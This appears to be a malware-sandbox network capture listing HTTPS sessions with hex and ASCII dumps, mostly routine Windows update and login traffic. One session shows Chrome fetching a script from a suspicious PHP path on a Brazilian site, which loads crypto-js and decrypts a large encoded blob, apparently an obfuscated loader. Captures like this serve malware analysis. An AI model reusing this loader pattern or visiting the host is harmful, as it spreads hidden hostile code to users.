                                                                2024-08-27 18:03:18 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1649706184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:19 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-08-27 18:03:19 UTC466INHTTP/1.1 200 OK
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (lpl/EF17)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-weu-z1
                                                                Cache-Control: public, max-age=77827
                                                                Date: Tue, 27 Aug 2024 18:03:19 GMT
                                                                Connection: close
                                                                X-CID: 2


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.164970740.126.31.73443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:19 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                Connection: Keep-Alive
                                                                Content-Type: application/soap+xml
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                Content-Length: 4762
                                                                Host: login.live.com
                                                                2024-08-27 18:03:19 UTC4762OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                2024-08-27 18:03:19 UTC569INHTTP/1.1 200 OK
                                                                Cache-Control: no-store, no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                Expires: Tue, 27 Aug 2024 18:02:19 GMT
                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C538_BAY
                                                                x-ms-request-id: b3d32c5a-ad79-45e4-ad34-8800aabf68b9
                                                                PPServer: PPV: 30 H: PH1PEPF00011EDE V: 0
                                                                X-Content-Type-Options: nosniff
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-XSS-Protection: 1; mode=block
                                                                Date: Tue, 27 Aug 2024 18:03:18 GMT
                                                                Connection: close
                                                                Content-Length: 10197
                                                                2024-08-27 18:03:19 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.1649708184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                Range: bytes=0-2147483646
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-08-27 18:03:20 UTC514INHTTP/1.1 200 OK
                                                                ApiVersion: Distribute 1.1
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (lpl/EF06)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-weu-z1
                                                                Cache-Control: public, max-age=81740
                                                                Date: Tue, 27 Aug 2024 18:03:20 GMT
                                                                Content-Length: 55
                                                                Connection: close
                                                                X-CID: 2
                                                                2024-08-27 18:03:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.164971040.68.123.157443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:21 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USmGenYh+nnGnwz&MD=Om4EY1cl HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-08-27 18:03:22 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                MS-CorrelationId: b1c43892-53a5-4941-8961-f2367897bbe1
                                                                MS-RequestId: fe894f63-091d-46c1-bad3-3cbfdc67a499
                                                                MS-CV: +oYxmfoCyUqDFz5/.0
                                                                X-Microsoft-SLSClientCache: 2880
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Tue, 27 Aug 2024 18:03:21 GMT
                                                                Connection: close
                                                                Content-Length: 24490
                                                                2024-08-27 18:03:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                2024-08-27 18:03:22 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.164971240.126.31.73443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:22 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                Connection: Keep-Alive
                                                                Content-Type: application/soap+xml
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                Content-Length: 4710
                                                                Host: login.live.com
                                                                2024-08-27 18:03:22 UTC4710OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                2024-08-27 18:03:23 UTC569INHTTP/1.1 200 OK
                                                                Cache-Control: no-store, no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                Expires: Tue, 27 Aug 2024 18:02:23 GMT
                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C538_SN1
                                                                x-ms-request-id: 5ab52d18-fe65-4d3b-b9c5-794fba92d897
                                                                PPServer: PPV: 30 H: SN1PEPF0004014E V: 0
                                                                X-Content-Type-Options: nosniff
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-XSS-Protection: 1; mode=block
                                                                Date: Tue, 27 Aug 2024 18:03:22 GMT
                                                                Connection: close
                                                                Content-Length: 10173
                                                                2024-08-27 18:03:23 UTC10173INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.164972745.164.92.1884433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:29 UTC685OUTGET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:29 UTC182INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:28 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/javascript
                                                                2024-08-27 18:03:29 UTC8010INData Raw: 33 65 33 66 0d 0a 76 61 72 20 61 63 63 6f 6d 6d 6f 64 61 74 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 61 63 63 6f 6d 6d 6f 64 61 74 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 61 63 63 6f 6d 6d 6f 64 61 74 65 29 3b 0d 0a 61 63 63 6f 6d 6d 6f 64 61 74 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e
                                                                Data Ascii: 3e3fvar accommodate= document.createElement("script");accommodate.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(accommodate);accommodate.onload=function(){var {a,b,c,d} = JSON.
                                                                2024-08-27 18:03:29 UTC7931INData Raw: 79 53 6d 56 74 4f 47 64 6d 54 6d 74 42 62 6b 68 79 64 45 74 61 54 47 5a 79 52 7a 4d 32 65 44 45 35 4d 56 6c 31 65 6d 4a 74 56 6b 56 4b 4f 48 63 33 53 57 5a 61 63 6e 6c 56 56 54 68 4f 55 56 68 43 52 46 52 53 4d 33 4a 77 64 7a 68 35 4b 32 5a 33 4b 33 64 78 65 57 68 5a 5a 33 42 47 52 6a 4a 4d 62 46 4a 33 59 58 52 51 56 46 4e 47 55 30 31 59 61 47 78 79 56 54 55 72 59 31 56 33 54 57 64 51 56 31 49 79 54 44 4e 79 53 57 5a 6e 57 45 6c 46 5a 30 56 61 63 30 64 75 4f 55 6c 36 56 32 35 44 63 30 74 31 63 6b 73 78 51 32 4e 45 53 55 52 61 65 45 56 46 53 6b 4e 34 56 45 64 75 65 6e 4a 78 61 55 78 45 4d 6d 4e 36 58 43 38 79 59 7a 6c 75 5a 56 56 4f 58 43 39 45 65 6a 6c 47 55 6b 30 77 61 48 70 69 57 46 4a 70 62 47 5a 52 5a 33 4a 4a 63 48 46 4c 4f 48 56 6e 51 56 77 76 55 6e
                                                                Data Ascii: ySmVtOGdmTmtBbkhydEtaTGZyRzM2eDE5MVl1emJtVkVKOHc3SWZacnlVVThOUVhCRFRSM3Jwdzh5K2Z3K3dxeWhZZ3BGRjJMbFJ3YXRQVFNGU01YaGxyVTUrY1V3TWdQV1IyTDNySWZnWElFZ0Vac0duOUl6V25Dc0t1cksxQ2NESURaeEVFSkN4VEduenJxaUxEMmN6XC8yYzluZVVOXC9EejlGUk0waHpiWFJpbGZRZ3JJcHFLOHVnQVwvUn
                                                                2024-08-27 18:03:29 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:03:29 UTC8192INData Raw: 31 66 34 30 0d 0a 5a 4b 62 58 70 36 54 32 68 6f 5a 46 77 76 4f 47 64 75 64 45 45 78 64 56 6c 52 63 44 4e 45 56 44 55 7a 56 30 4a 63 4c 32 74 56 53 32 4a 4c 5a 6a 56 77 59 6d 4a 77 56 45 51 30 59 32 39 45 61 32 64 53 55 57 64 55 61 6c 68 69 4d 6e 4e 70 56 48 45 79 4e 55 64 33 51 58 64 57 55 6c 5a 6a 53 6d 52 35 55 48 56 57 53 45 68 4c 53 55 68 44 51 32 63 32 5a 33 5a 79 51 6d 51 33 55 56 77 76 4f 54 4a 53 57 46 51 32 52 57 74 42 65 6a 56 46 51 54 5a 68 53 6d 74 63 4c 30 6c 63 4c 7a 6b 32 62 6d 4e 32 65 6b 6c 78 62 47 46 35 53 6d 31 4d 4d 7a 4d 31 64 31 56 53 64 30 39 73 64 46 6f 35 4e 45 4e 50 54 32 5a 4b 4e 45 46 73 53 54 46 79 62 6e 64 57 59 6d 30 30 5a 6b 35 33 54 46 6c 78 55 45 39 55 4e 58 68 73 57 48 51 79 54 6d 64 44 52 6a 46 4d 56 31 70 4b 62 6b 55
                                                                Data Ascii: 1f40ZKbXp6T2hoZFwvOGdudEExdVlRcDNEVDUzV0JcL2tVS2JLZjVwYmJwVEQ0Y29Ea2dSUWdUalhiMnNpVHEyNUd3QXdWUlZjSmR5UHVWSEhLSUhDQ2c2Z3ZyQmQ3UVwvOTJSWFQ2RWtBejVFQTZhSmtcL0lcLzk2bmN2eklxbGF5Sm1MMzM1d1VSd09sdFo5NENPT2ZKNEFsSTFybndWYm00Zk53TFlxUE9UNXhsWHQyTmdDRjFMV1pKbkU
                                                                2024-08-27 18:03:29 UTC7822INData Raw: 53 31 5a 54 55 56 49 35 62 31 56 79 62 58 70 4a 57 55 39 32 56 57 56 31 63 6d 4e 76 62 69 74 56 5a 6d 67 77 61 55 68 49 56 55 52 49 53 58 64 68 56 54 42 68 5a 55 4a 75 52 30 64 5a 51 32 52 68 63 56 42 30 4e 45 56 34 55 6c 46 6f 57 56 59 78 65 57 68 42 62 46 77 76 54 54 42 36 62 55 5a 30 64 6d 74 76 65 47 78 69 54 47 6c 68 57 6c 6c 69 52 6d 74 4c 4e 48 64 45 4e 57 5a 6b 64 7a 6c 50 62 46 56 74 61 33 64 4f 4d 47 45 31 59 6e 4a 30 57 6a 46 50 53 6b 4a 48 59 57 35 68 62 57 35 75 56 47 4a 46 53 6a 6c 33 62 54 64 43 4b 31 5a 46 52 55 4e 51 54 6c 5a 36 61 47 64 44 63 54 45 33 53 30 4e 43 4e 47 4a 51 65 6d 39 74 55 33 52 6d 64 6b 4e 35 57 47 68 35 59 55 31 7a 53 54 45 31 4d 33 5a 47 4e 30 67 31 65 56 68 4b 4d 56 6c 70 64 6c 68 35 59 6d 45 78 51 55 46 6f 53 31 51
                                                                Data Ascii: S1ZTUVI5b1VybXpJWU92VWV1cmNvbitVZmgwaUhIVURISXdhVTBhZUJuR0dZQ2RhcVB0NEV4UlFoWVYxeWhBbFwvTTB6bUZ0dmtveGxiTGlhWlliRmtLNHdENWZkdzlPbFVta3dOMGE1YnJ0WjFPSkJHYW5hbW5uVGJFSjl3bTdCK1ZFRUNQTlZ6aGdDcTE3S0NCNGJQem9tU3RmdkN5WGh5YU1zSTE1M3ZGN0g1eVhKMVlpdlh5YmExQUFoS1Q
                                                                2024-08-27 18:03:29 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:03:29 UTC1461INData Raw: 35 61 65 0d 0a 74 6e 56 47 4e 63 4c 7a 64 4d 56 44 4e 79 64 55 5a 7a 4b 30 46 6a 4d 31 52 48 55 30 4a 4f 5a 6d 78 30 61 31 55 79 53 47 4a 4e 59 54 68 58 4d 46 5a 4c 64 58 6b 34 56 58 6c 6d 62 33 70 4e 64 55 39 6f 5a 6b 56 50 58 43 39 4b 51 6e 6c 6f 5a 6b 31 61 57 46 5a 55 4f 57 64 4b 61 57 70 58 63 54 68 4c 58 43 39 4e 63 6a 59 79 57 57 4a 32 61 7a 68 43 51 54 42 61 63 6b 31 6b 63 31 52 6d 63 69 74 57 63 31 52 6f 52 6a 56 49 56 56 46 43 61 57 4a 77 54 6d 74 51 61 55 6c 6a 4e 6b 52 6d 5a 47 35 6d 51 55 34 78 61 6d 56 33 4e 47 49 78 4d 6c 56 59 64 33 56 50 61 30 35 43 52 55 64 35 4f 57 39 5a 4f 44 5a 47 51 32 46 48 4e 6b 39 71 52 46 42 44 62 56 6b 34 55 33 46 4c 56 7a 46 6b 61 6b 52 63 4c 33 4e 77 56 56 70 63 4c 30 64 30 52 44 68 42 52 46 77 76 54 47 78 50
                                                                Data Ascii: 5aetnVGNcLzdMVDNydUZzK0FjM1RHU0JOZmx0a1UySGJNYThXMFZLdXk4VXlmb3pNdU9oZkVPXC9KQnloZk1aWFZUOWdKaWpXcThLXC9NcjYyWWJ2azhCQTBack1kc1RmcitWc1RoRjVIVVFCaWJwTmtQaUljNkRmZG5mQU4xamV3NGIxMlVYd3VPa05CRUd5OW9ZODZGQ2FHNk9qRFBDbVk4U3FLVzFkakRcL3NwVVpcL0d0RDhBRFwvTGxP
                                                                2024-08-27 18:03:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.1649728104.17.24.144433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:30 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:30 UTC964INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:30 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425311
                                                                Expires: Sun, 17 Aug 2025 18:03:30 GMT
